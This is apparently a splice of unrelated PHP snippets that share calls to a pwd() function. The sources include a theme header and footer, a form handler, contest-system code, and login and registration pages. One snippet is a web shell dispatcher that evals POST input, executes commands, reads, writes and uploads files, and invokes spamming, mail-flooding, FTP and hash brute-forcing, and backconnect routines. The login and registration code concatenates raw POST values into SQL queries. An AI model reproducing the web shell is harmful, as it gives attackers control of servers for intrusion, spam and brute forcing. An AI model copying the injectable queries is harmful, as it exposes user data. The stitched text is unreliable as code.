<?php $pwd = pwd(); ?> <?php $get_hd = get_hd(); ?> <!DOCTYPE html> <html> <head> <link rel="shortcut icon" type="image/png" href="<?php echo $pwd ?>img/favicon.png"/> <link rel="apple-touch-icon" href="<?php echo $pwd ?>img/favicon_apple.png"/> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!--title--> <title>Будівельна компанія MS</title> <!--CSS--> <link href="<?php echo $pwd ?>css/bootstrap.min.css" rel="stylesheet"> <!-- Add fancyBox --> <link rel="stylesheet" href="<?php echo $pwd ?>fancybox/source/jquery.fancybox.css?v=2.1.5" type="text/css" media="screen" /> <!-- Optionally add helpers - button, thumbnail and/or media --> <link rel="stylesheet" href="<?php echo $pwd ?>fancybox/source/helpers/jquery.fancybox-buttons.css?v=1.0.5" type="text/css" media="screen" /> <link rel="stylesheet" href="<?php echo $pwd ?>fancybox/source/helpers/jquery.fancybox-thumbs.css?v=1.0.7" type="text/css" media="screen" /> <link href="http://vjs.zencdn.net/4.11/video-js.css" rel="stylesheet">
function shell() { if ($_POST['type'] == 1) { eval(stripslashes($_POST['value'])); } elseif ($_POST['type'] == 2) { pwd(); print_r(ex(stripslashes($_POST['value']))); } elseif ($_POST['type'] == 3) { if ($_SESSION['safe_mode'] == 1) { if (($u = safe_ex('ls -la')) != '') { return $u; } else { return safe_ex('dir'); } } else { if (($u = ex('ls -la')) != '') { return $u; } else { return ex('dir'); } } } elseif ($_POST['type'] == 4) { if (file_exists(stripslashes($_POST['value']))) { if ($safe_mode != 1) { echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']), "rw"), filesize(stripslashes($_POST['value'])))); } else { echo htmlspecialchars(safe_read(stripslashes($_POST['value']))); } $_SESSION['edit'] = 1; $_SESSION['filename'] = $_POST['value']; } else { return 'File doesn\'t exists!'; } } elseif ($_POST['type'] == 5) { fputs(fopen($_SESSION['filename'], "w"), stripslashes($_POST['value'])); } elseif ($_POST['type'] == 6) { $uploaddir = pwd(); if (!($name = $_POST['newname'])) { $name = $_FILES['userfile']['name']; } move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name); } elseif ($_POST['type'] == 7) { echo alias($_POST['value']); } elseif ($_POST['type'] == 8) { echo spammer(stripslashes($_POST['from']), stripslashes($_POST['subject']), stripslashes($_POST['msg']), stripslashes($_POST['check']), stripslashes($_POST['elist']), stripslashes($_POST['logf'])); } elseif ($_POST['type'] == 9) { echo ftp_brute(stripslashes($_POST['host']), stripslashes($_POST['users']), stripslashes($_POST['passwd']), stripslashes($_POST['log'])); } elseif ($_POST['type'] == 10) { echo flooder(stripslashes($_POST['log']), stripslashes($_POST['to']), stripslashes($_POST['from']), stripslashes($_POST['subject']), stripslashes($_POST['msg']), stripslashes($_POST['amount']), stripslashes($_POST['check'])); } elseif ($_POST['type'] == 12) { echo backconnect(stripslashes($_POST['ip']), stripslashes($_POST['port']), stripslashes($_POST['method'])); } elseif ($_POST['type'] == 13) { echo backconnect(stripslashes($_POST['port']), stripslashes($_POST['pass']), stripslashes($_POST['method'])); } elseif ($_POST['type'] == 14) { echo md5_brute(stripslashes($_POST['hash']), stripslashes($_POST['log']), stripslashes($_POST['dict'])); } else { $u = ex('ls -la'); if ($u == '') { return ex('dir'); } else { return $u; } } return null; }
<?php wp_footer(); $pwd = pwd(); ?> <footer> <div class="container"> <div class="col-md-12"> <div class="row"> </div> </div> </div> </div> </footer> <script src="<?php echo $pwd; ?> libs/slick/1.5.7/slick.min.js"></script> <script src="<?php echo $pwd; ?> js/parallax.min.js"></script> <script src="https://maps.googleapis.com/maps/api/js"></script> <script type="text/javascript" src="http://cdn.jsdelivr.net/jquery.slick/1.5.7/slick.min.js"></script> <script src="<?php echo $pwd;
<?php /** * Created by PhpStorm. * User: csibi * Date: 2015.07.13. * Time: 11:38 */ $return_SQL = true; if ($succeed = \Routerunner\Form::submit($runner->form, $errors, $return_SQL, $return_params)) { $saved = false; if (isset($return_params[":nonce"], $_SESSION["nonce"]) && \Routerunner\Crypt::checker($return_params[":nonce"], $_SESSION["nonce"])) { unset($_SESSION["nonce"]); $pwd_change = false; if ($return_params[":pwd"] && $return_params[":pwd_confirm"] && $return_params[":pwd"] === $return_params[":pwd_confirm"]) { $return_params[":pwd"] = pwd($return_params[":email"], $return_params[":pwd"]); $pwd_change = true; } elseif (($return_params[":pwd"] || $return_params[":pwd_confirm"]) && $return_params[":pwd"] !== $return_params[":pwd_confirm"]) { $errors["pwd_confirm"] = "Passwords not equals!"; } $is_insert = false; $name = $return_params[":name"]; $usergroup = $return_params[":usergroup"]; if (strpos($return_SQL, "INSERT") === 0) { $return_SQL = str_replace(array("`nonce`, ", "`id`, ", ", `usergroup`", ", `name`", ", `pwd_confirm`"), "", $return_SQL); $return_SQL = str_replace(array(":nonce, ", ":id, ", ", :usergroup", ", :name", ", :pwd_confirm"), "", $return_SQL); if (!$pwd_change) { $return_SQL = str_replace(", `pwd`", "", $return_SQL); $return_SQL = str_replace(", :pwd", "", $return_SQL); } unset($return_params[":id"]);
$start_time = convert_str($_POST['start_time']); $end_time = convert_str($_POST['end_time']); if ($_POST["localtime"] == 1) { $dt = new DateTime($start_time, new DateTimeZone($_POST['localtz'])); $dt->setTimezone(new DateTimeZone($mytimezone)); $start_time = $dt->format('Y-m-d H:i:s'); $dt = new DateTime($lock_board_time, new DateTimeZone($_POST['localtz'])); $dt->setTimezone(new DateTimeZone($mytimezone)); $lock_board_time = $dt->format('Y-m-d H:i:s'); $dt = new DateTime($end_time, new DateTimeZone($_POST['localtz'])); $dt->setTimezone(new DateTimeZone($mytimezone)); $end_time = $dt->format('Y-m-d H:i:s'); } $ctype = convert_str($_POST['ctype']); $hide_others = convert_str($_POST['hide_others']); $pass = pwd(convert_str($_POST['password'])); if ($_POST['password'] != "") { $isprivate = 2; } if ($ctype == 0) { $n = $config["limits"]["problems_on_contest_add"]; } else { $n = $paratypemax; } for ($i = 0; $i < $n; $i++) { $pid[$i] = convert_str($_POST['pid' . $i]); $lable[$i] = convert_str($_POST['lable' . $i]); $ptype[$i] = convert_str($_POST['ptype' . $i]); $base[$i] = convert_str($_POST['base' . $i]); $minp[$i] = convert_str($_POST['minp' . $i]); $paraa[$i] = convert_str($_POST['paraa' . $i]);
<?php include "db_conn.php"; if (db_user_match($_POST['username'], pwd($_POST['password'])) && db_user_isroot($_POST['username'])) { session_start(); $_SESSION['isroot'] = 1; } include "header.php"; if (db_user_match($_POST['username'], pwd($_POST['password']))) { $row = mysql_fetch_array(mysql_query("select * from user where username='******'username'] . "'")); ?> <div class="mainbar"> <div class="article"> <h2>我的信息</h2><div class="clr"></div> <table width="100%"> <tr><th>姓名:</th><td><?php echo $row['realname']; ?> </td></tr> <tr><th>性别:</th><td><?php echo $row['sex']; ?> </td></tr> <tr><th>邮箱:</th><td><?php echo $row['mailaddress']; ?> </td></tr> <tr><th>手机:</th><td><?php echo $row['mobilephone']; ?> </td></tr>
<?php include_once dirname(__FILE__) . "/../functions/contests.php"; $cid = convert_str($_POST['cid']); $opass = contest_get_val($cid, "password"); $pass = convert_str($_POST['password']); $ret = array(); if ($opass == pwd($pass)) { setcookie($config["cookie_prefix"] . "contest_pass_{$cid}", pwd($pass), 0, $config["base_path"]); $ret["code"] = 0; $ret["msg"] = "Success!"; } else { $ret["code"] = 1; $ret["msg"] = "Wrong password."; } echo json_encode($ret);
<?php echo pwd();
if ($s[$i] >= '0' && $s[$i] <= '9' || $s[$i] >= 'a' && $s[$i] <= 'z' || $s[$i] >= 'A' && $s[$i] <= 'Z' || $s[i] == '-' || $s[i] == '_') { continue; } else { break; } } if ($i != strlen($s)) { echo "用户名非法,请<a href='javascript:window.history.back()'>返回</a>重新选择用户名。\n"; } else { if ($_POST['password'] != $_POST['repassword']) { echo "密码不一致,请<a href='javascript:window.history.back()'>返回</a>重新输入。\n"; } else { if ($_POST['username'] == "" || $_POST["password"] == "" || $_POST["realname"] == "" || $_POST["mailaddress"] == "" || $_POST["mobilephone"] == "" || $_POST["sno"] == "") { echo "信息输入错误,请<a href='javascript:window.history.back()'>返回</a>重新输入。\n"; } else { $sql = "insert into user set activation = 1, " . " username = '******'username'] . "', " . " password = '******'password']) . "', " . " realname = '" . $_POST['realname'] . "', " . " sex = '" . $_POST['sex'] . "', " . " mailaddress = '" . $_POST['mailaddress'] . "', " . " mobilephone = '" . $_POST['mobilephone'] . "', " . " depart = '" . $_POST['depart'] . "', " . " sno = '" . $_POST['sno'] . "', " . " grade = '" . $_POST['grade'] . "' "; $res = mysql_query($sql); if (!$res) { echo "注册失败,请与管理员<a href='mailto:acm@mail.bnu.edu.cn'>联系</a>。\n"; } else { $mail = new PHPMailer(); $mail->IsSMTP(); // telling the class to use SMTP $mail->SMTPDebug = 1; $mail->SMTPAuth = true; $mail->Host = "mail.bnu.edu.cn"; // sets the SMTP server $mail->Port = 25; // set the SMTP port for the GMAIL server $mail->Username = "******"; // SMTP account username